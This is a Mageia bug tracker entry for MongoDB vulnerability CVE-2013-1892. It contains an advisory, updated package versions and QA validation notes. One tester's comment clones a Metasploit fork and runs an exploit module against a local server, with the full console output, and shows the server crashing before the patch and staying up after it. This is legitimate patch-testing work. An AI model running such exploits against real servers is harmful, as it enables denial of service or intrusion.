Bug 9670 - mongodb new security issue CVE-2013-1892
Summary: mongodb new security issue CVE-2013-1892
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security (show other bugs)
Version: 2
Hardware: i586 Linux
Priority: Normal critical
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL: http://lwn.net/Vulnerabilities/546486/
Whiteboard: has_procedure mga2-32-ok MGA2-64-OK
Keywords: validated_update
Depends on:
Blocks:
 
Reported: 2013-04-08 22:52 CEST by David Walser
Modified: 2013-04-18 00:24 CEST (History)
3 users (show)

See Also:
Source RPM: mongodb-2.2.2-2.mga3.src.rpm
CVE:
Status comment:


Attachments

Description David Walser 2013-04-08 22:52:19 CEST
Fedora has issued an advisory on March 29:
http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101630.html

Mageia 2 is also affected.

Reproducible: 

Steps to Reproduce:
David Walser 2013-04-08 22:52:25 CEST

Whiteboard: (none) => MGA2TOO

Comment 1 David Walser 2013-04-10 18:10:50 CEST
Patched packages uploaded for Mageia 2 and Cauldron.

Note to QA, exploits are available from a blog post linked in RedHat's bug, and there's a Metasploit module available for this.

Advisory:
========================

Updated mongodb packages fix security vulnerability:

MongoDB 2.4.1 and earlier is prone to a remote code-injection vulnerability
because it fails to properly sanitize user-supplied input. An attacker can
exploit this vulnerability to inject and execute arbitrary code within the
context of the affected application (CVE-2013-1892).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1892
http://www.securityfocus.com/bid/58695/info
http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101630.html
========================

Updated packages in core/updates_testing:
========================
mongodb-2.0.3-4.1.mga2
mongodb-server-2.0.3-4.1.mga2

from mongodb-2.0.3-4.1.mga2.src.rpm

Version: Cauldron => 2
Assignee: fundawang => qa-bugs
Whiteboard: MGA2TOO => (none)

Comment 2 claire robinson 2013-04-11 15:53:34 CEST
Testing complete i586 with metasploit and the exploit from here http://www.securityfocus.com/bid/58695/exploit


Before
------
Edited /etc/mongod.conf and uncommented the port.

# service mongod start
Starting mongod (via systemctl):                     [  OK  ]

$ git clone https://github.com/bcoles/metasploit-framework.git metasploit

Save the exploit to metasploit/modules/exploits/linux/misc/

$ cd metasploit
$ ./msfconsole

msf > use exploit/linux/misc/58695
msf  exploit(58695) > set RHOST localhost
RHOST => localhost
msf  exploit(58695) > exploit

[*] Started reverse handler on 127.0.0.1:4444
[+] Mongo server localhost doesn't use authentication
[+] New document created in collection atcf
[*] Let's exploit, heap spray could take some time...
[*] Exploit completed, but no session was created.

In another terminal..
$ mongo
MongoDB shell version: 2.0.3
connecting to: test
Thu Apr 11 14:28:03 Error: couldn't connect to server 127.0.0.1 shell/mongo.js:84
exception: connect failed

# systemctl restart mongod.service
# systemctl status mongod.service
mongod.service - High-performance, schema-free document-oriented database
          Loaded: loaded (/lib/systemd/system/mongod.service; enabled)
          Active: failed (Result: exit-code) since Thu, 11 Apr 2013 14:30:01 +0100; 2s ago
         Process: 12485 ExecStart=/usr/bin/mongod $OPTIONS --pidfilepath /var/run/mongo/mongo.pid run (code=exited, status=0/SUCCESS)
        Main PID: 12488 (code=exited, status=100)
          CGroup: name=systemd:/system/mongod.service

So it appears we're not vulnerable to the remote code execution but it does kill the server so still a DOS. It also prevents the server from being restarted without rm -rf /var/lib/mongo/*

Reading https://bugzilla.redhat.com/show_bug.cgi?id=928193#c2 Fedora found they were not vulnerable but don't mention the DOS.


After
-----
# rm -rf /var/lib/mongo/*
# systemctl restart mongod.service
# systemctl status mongod.service
mongod.service - High-performance, schema-free document-oriented database
          Loaded: loaded (/lib/systemd/system/mongod.service; enabled)
          Active: active (running) since Thu, 11 Apr 2013 14:36:25 +0100; 2s ago

$ mongo
MongoDB shell version: 2.0.3
connecting to: test
> exit
bye

Testing with metasploit again..

msf  exploit(58695) > exploit

[*] Started reverse handler on 127.0.0.1:4444
[+] Mongo server localhost doesn't use authentication
[+] New document created in collection zqgr
[*] Let's exploit, heap spray could take some time...
[*] Exploit completed, but no session was created.

# systemctl status mongod.service
mongod.service - High-performance, schema-free document-oriented database
          Loaded: loaded (/lib/systemd/system/mongod.service; enabled)
          Active: active (running) since Thu, 11 Apr 2013 14:36:25 +0100; 2min 40s ago


So the update prevents the DOS and the CVE is closed.

Testing with a few bits from here..
http://docs.mongodb.org/manual/tutorial/getting-started/

Dropping the admin database created by metaploit

> show dbs
admin   0.0625GB
local   (empty)
> use admin
switched to db admin
> db.dropDatabase()
{ "dropped" : "admin", "ok" : 1 }

Followed the Getting Started tutorial OK.

Whiteboard: (none) => has_procedure mga2-32-ok

Comment 3 Dave Hodgins 2013-04-11 23:11:09 CEST
Testing complete on Mageia 2 x86-64.

Could someone from the sysadmin team push the srpm
mongodb-2.0.3-4.1.mga2.src.rpm
from Mageia 2 Core Updates Testing to Core Updates.

Advisory: Updated mongodb packages fix security vulnerability:

MongoDB 2.4.1 and earlier is prone to a remote code-injection vulnerability
because it fails to properly sanitize user-supplied input. An attacker can
exploit this vulnerability to inject and execute arbitrary code within the
context of the affected application (CVE-2013-1892).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1892
http://www.securityfocus.com/bid/58695/info
http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101630.html

https://bugs.mageia.org/show_bug.cgi?id=9670

Keywords: (none) => validated_update
Whiteboard: has_procedure mga2-32-ok => has_procedure mga2-32-ok MGA2-64-OK
CC: (none) => davidwhodgins, sysadmin-bugs

Comment 4 Thomas Backlund 2013-04-18 00:24:15 CEST
Update pushed:
https://wiki.mageia.org/en/Support/Advisories/MGASA-2013-0118

Status: NEW => RESOLVED
CC: (none) => tmb
Resolution: (none) => FIXED


Note You need to log in before you can comment on or make changes to this bug.